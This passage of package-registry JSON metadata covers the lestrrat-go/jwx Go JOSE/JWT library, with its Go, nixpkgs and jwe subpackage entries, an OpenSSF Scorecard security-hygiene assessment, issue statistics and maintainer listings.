0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30931133,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-25T07:55:14.202Z","status":"ssl_error","status_checked_at":"2026-03-25T07:55:10.924Z","response_time":80,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-03-25T17:02:41.866Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.374974371906944,"dependent_packages_count":5.036807650550465,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":5.2058910112287045},"purl":"pkg:golang/github.com/%21le%21strrat-go/jwx/v2","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/LeStrrat-go/jwx/v2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/LeStrrat-go/jwx/v2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/LeStrrat-go/jwx/v2/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FLeStrrat-go%2Fjwx%2Fv2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FLeStrrat-go%2Fjwx%2Fv2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FLeStrrat-go%2Fjwx%2Fv2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FLeStrrat-go%2Fjwx%2Fv2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FLeStrrat-go%2Fjwx%2Fv2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FLeStrrat-go%2Fjwx%2Fv2/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":13276074,"name":"jwx","ecosystem":"nixpkgs","description":" Implementation of various JWx (Javascript Object Signing and Encryption/JOSE) technologies","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-02T05:16:53.986Z","latest_release_published_at":"2026-02-02T05:16:53.986Z","latest_release_number":"2.0.16","last_synced_at":"2026-04-14T03:05:37.479Z","created_at":"2026-02-02T05:16:47.022Z","updated_at":"2026-04-14T03:30:22.448Z","registry_url":"https://search.nixos.org/packages?channel=23.11\u0026query=jwx","install_command":"nix-env -iA nixpkgs.jwx","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.11/pkgs/tools/security/jwx/default.nix#L22","metadata":{"nix_attribute":"jwx-2.0.16","position":"pkgs/tools/security/jwx/default.nix:22","platforms":["x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"]},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-03-25T17:02:36.756Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":0.32446523322671894,"forks_count":0.34849969494721666,"docker_downloads_count":null,"average":0.1682412320434839},"purl":"pkg:nix/jwx?channel=23.11\u0026repository_url=https://channels.nixos.org/nixos-23.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/jwx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/jwx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/jwx/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/jwx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/jwx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/jwx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/jwx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/jwx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/jwx/codemeta","maintainers":[{"uuid":"flokli","login":null,"name":"Florian Klink","email":"flokli@flokli.de","url":"https://github.com/flokli","packages_count":74,"html_url":null,"role":null,"created_at":"2026-03-04T06:44:01.841Z","updated_at":"2026-03-04T06:44:01.841Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers/flokli/packages"},{"uuid":"arianvp","login":null,"name":"Arian van Putten","email":"arian.vanputten@gmail.com","url":"https://github.com/arianvp","packages_count":12,"html_url":null,"role":null,"created_at":"2026-03-04T06:44:01.803Z","updated_at":"2026-03-04T06:44:01.803Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers/arianvp/packages"}],"registry":{"name":"nixpkgs-23.11","url":"https://channels.nixos.org/nixos-23.11","ecosystem":"nixpkgs","default":false,"packages_count":108178,"maintainers_count":2997,"namespaces_count":0,"keywords_count":569,"github":"NixOS","metadata":{"funded_packages_count":229},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.577Z","updated_at":"2026-06-10T05:16:53.702Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/namespaces"}},{"id":14431077,"name":"github.com/lestrrat-go/jwx/v2/jwe","ecosystem":"go","description":"Package jwe implements JWE as described in https://tools.ietf.org/html/rfc7516","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2","versions_count":32,"first_release_published_at":"2026-05-12T05:45:37.392Z","latest_release_published_at":"2026-05-12T05:45:37.392Z","latest_release_number":"v2.1.6","last_synced_at":"2026-05-12T05:45:39.773Z","created_at":"2026-05-12T05:44:49.578Z","updated_at":"2026-05-12T05:45:39.773Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwe","install_command":"go get 